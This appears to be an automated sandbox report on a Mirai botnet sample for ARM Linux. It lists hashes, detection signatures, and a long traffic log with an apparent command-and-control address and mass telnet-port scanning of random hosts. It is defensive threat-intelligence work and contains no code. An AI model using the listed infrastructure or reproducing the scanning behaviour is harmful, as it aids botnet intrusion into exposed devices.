Linux Analysis Report
5OGAx17mRN.elf

Overview

General Information

Sample Name: 5OGAx17mRN.elf
Original Sample Name: 22769c1fd6d4ee506a64408ffb831681.elf
Analysis ID: 1345559
MD5: 22769c1fd6d4ee506a64408ffb831681
SHA1: 0384e5802354b3a9086b02e28d560e1788a9739c
SHA256: 233b3551effe9319a0ea73aec9e36ce62e0d1029e57b10c3366a8c518748d073
Tags: 32armelfmirai
Infos:

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

barindex
Source: 5OGAx17mRN.elf ReversingLabs: Detection: 26%
Source: 5OGAx17mRN.elf Virustotal: Detection: 25% Perma Link

Networking

barindex
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44008
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44010
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44018
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44020
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44026
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44028
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44178
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44182
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 38140
Source: global traffic TCP traffic: 192.168.2.15:53324 -> 45.88.90.129:9902
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 27.50.62.101:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 201.74.247.178:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 164.203.11.112:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 123.85.128.119:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 83.63.142.101:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 61.112.251.159:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 79.4.70.240:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 161.77.73.173:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 158.145.64.42:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 176.58.116.32:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 81.203.133.121:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 195.138.68.196:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 36.103.171.192:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 111.208.240.148:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 177.132.228.153:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 2.110.206.66:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 186.33.242.132:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 189.176.155.66:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 177.116.156.108:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 66.99.229.29:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 150.129.134.209:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 20.153.26.214:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 171.85.195.159:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 82.254.255.20:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 188.31.20.21:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 110.176.29.115:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 161.218.10.197:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 41.193.154.137:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 66.222.192.163:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 47.56.1.93:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 180.165.78.244:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 5.231.247.3:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 45.196.111.182:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 198.185.188.21:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 221.196.210.90:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 164.248.187.21:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 69.181.28.250:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 149.22.6.78:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 48.172.191.173:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 130.7.82.4:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 117.252.242.249:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 194.10.181.162:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 188.151.113.63:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 95.2.70.113:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 89.6.67.104:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 78.15.196.27:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 53.180.130.64:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 59.110.194.3:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 191.245.220.127:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 222.100.14.110:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 153.45.219.111:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 173.182.99.185:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 189.200.37.59:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.34.9.54:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 223.220.152.138:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 119.194.77.140:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.27.55.12:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 34.105.32.20:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 59.151.37.246:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.211.1.165:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 31.204.37.190:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 68.124.58.99:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 84.166.21.247:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 97.164.51.177:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 189.46.28.179:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 40.36.19.102:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 203.236.225.209:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 213.85.103.2:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.223.125.156:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 84.111.16.129:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 115.145.18.156:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 139.99.2.56:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 139.122.198.91:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 104.120.146.170:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 211.133.211.255:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 153.151.127.52:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 154.64.65.40:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 45.231.209.215:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 107.31.102.72:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 176.234.193.187:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 45.201.212.155:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 179.83.229.214:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 104.38.208.128:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 176.56.217.147:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 128.47.42.242:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 219.2.163.249:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 75.113.213.148:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.175.45.19:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 1.120.92.250:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 154.109.188.29:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 85.188.136.110:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 154.97.147.144:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 143.250.15.90:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 85.215.224.85:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 212.4.7.19:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 206.181.26.240:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 103.174.205.125:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 74.135.74.233:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 63.117.255.210:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 109.77.180.136:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 147.132.229.104:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 181.37.235.64:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 180.109.68.55:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 86.164.207.123:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 23.13.164.226:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 203.72.228.18:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 140.10.189.105:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 187.215.100.143:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 124.73.26.163:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 209.87.131.86:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 160.131.22.222:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 40.49.32.151:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 213.60.209.136:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 151.52.241.7:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 14.247.83.148:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 200.20.46.185:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 209.152.153.221:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.94.101.235:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 23.175.246.210:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 159.193.101.144:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 222.226.73.48:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 151.96.151.43:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 161.96.212.111:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 125.114.183.96:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 119.48.234.179:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 144.156.184.43:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 184.131.2.30:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 205.190.123.221:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 219.190.144.45:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 36.218.62.7:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 198.149.149.244:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 212.169.46.153:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 174.230.239.162:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 44.83.28.102:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 108.237.41.119:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 102.207.159.188:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 93.121.85.56:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 105.103.208.81:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 155.106.54.201:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 132.138.107.120:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 98.68.118.75:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 86.20.191.159:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 159.7.60.38:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 53.197.2.80:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 123.77.164.74:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 72.48.244.165:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 152.70.53.115:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 141.211.94.29:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 86.177.8.119:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.121.138.83:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 130.33.112.74:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 135.44.123.59:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 183.14.81.22:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.189.226.253:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 71.201.109.134:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 107.38.209.55:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 220.29.1.168:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 123.223.101.87:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 218.112.234.223:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.147.14.224:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 104.120.205.2:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 160.112.150.173:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 88.245.164.150:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 124.45.245.88:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 108.247.32.211:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 201.60.12.159:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 203.38.129.1:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 218.216.57.220:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 176.95.193.213:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 126.182.233.236:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.134.235.215:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 133.138.116.194:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 220.128.230.10:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 134.246.47.60:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 118.88.109.3:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 81.159.225.195:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 88.213.151.75:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 105.170.103.221:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 193.128.224.136:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 5.73.46.146:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 141.9.88.138:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 159.124.7.221:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 76.206.35.17:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 109.250.86.231:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 89.189.128.199:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 98.25.3.146:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 75.122.208.55:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 18.191.50.2:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 222.126.110.2:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 165.231.154.72:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 126.182.121.121:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 185.95.92.84:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 102.187.148.86:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 129.34.130.40:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 223.101.162.19:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 57.51.82.58:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 206.163.119.215:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 109.145.13.14:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 201.218.9.9:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 19.113.241.135:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 46.158.158.47:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 69.86.55.222:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 84.222.242.133:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 122.123.74.246:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 123.8.242.181:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 92.82.125.104:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 69.22.122.199:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 73.231.181.3:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 154.49.162.160:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 121.178.227.146:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 145.180.91.23:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 95.112.238.216:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 107.83.50.230:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 41.120.81.45:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 20.36.208.219:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 44.62.236.89:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 199.28.80.88:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 198.69.193.216:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 62.189.248.152:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 140.205.216.116:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 207.80.129.30:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 78.125.79.73:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 119.188.70.147:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 111.179.84.130:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 23.130.164.78:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 85.224.120.200:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.77.59.163:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 220.27.102.109:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 213.143.239.150:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 32.61.119.219:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 195.183.4.12:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 164.43.12.112:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 139.28.65.33:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 72.228.108.233:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 130.19.8.180:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 216.53.134.39:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 144.60.224.15:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 70.9.177.210:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 46.42.202.161:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.197.181.98:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 204.182.44.43:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 146.93.121.228:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 208.43.133.207:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 122.193.124.11:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 187.78.226.131:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 140.155.249.215:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.111.241.30:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 107.12.235.96:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 105.144.240.18:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 128.156.191.242:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 158.116.236.74:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 141.74.202.142:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 24.9.173.94:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 93.12.182.157:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 218.209.22.230:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 2.212.251.203:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 116.223.15.59:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 161.45.187.97:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 19.24.203.84:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 217.152.220.92:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 67.214.12.220:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 176.174.30.9:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 8.147.98.53:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 132.43.224.205:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 23.148.132.34:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 34.98.67.187:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 195.0.172.164:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 43.244.144.159:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 24.157.3.219:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 120.175.203.91:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 128.147.191.78:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 221.165.163.136:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 77.32.161.85:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 31.78.222.48:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 150.48.189.88:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 117.225.138.22:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 89.249.193.10:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 85.249.51.138:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 94.68.182.113:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 138.222.74.94:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 63.48.47.144:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 189.47.184.252:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 174.4.142.16:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 16.210.180.44:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 4.18.72.177:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 73.152.96.236:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 60.48.111.83:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 173.235.62.148:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 86.94.99.235:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 210.165.189.194:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 207.136.195.203:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 77.167.127.186:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 220.64.31.138:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 171.64.151.42:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 39.71.8.103:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 47.184.12.157:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 168.6.19.165:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 107.95.235.95:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 53.251.48.90:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 101.33.10.245:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 16.230.225.167:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 9.251.35.88:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 46.102.253.246:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 106.24.245.22:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 18.114.208.133:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 158.87.36.223:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 203.25.202.29:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 59.226.231.46:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 155.122.10.112:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 164.114.26.152:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 8.28.133.0:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 141.99.222.255:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 183.205.41.180:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 75.85.120.189:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 184.156.17.125:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 77.224.122.131:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 206.20.11.220:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 190.58.0.28:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 140.239.193.242:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 193.233.251.193:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 143.38.33.194:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 187.42.224.62:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 37.190.2.143:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 195.48.217.238:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 75.36.208.22:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 122.21.247.24:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 34.194.55.36:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 113.234.198.36:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 74.241.165.30:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 152.24.233.141:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 148.238.178.78:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 155.141.182.231:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 186.9.55.48:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 222.182.196.76:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 117.58.152.29:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 113.209.145.103:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 181.35.129.103:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 203.228.26.68:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 34.183.236.183:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 115.252.142.62:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 58.98.160.172:2323
Source: global traffic TCP traffic: 192.168.2.15:54459 -> 92.144.177.55:2323
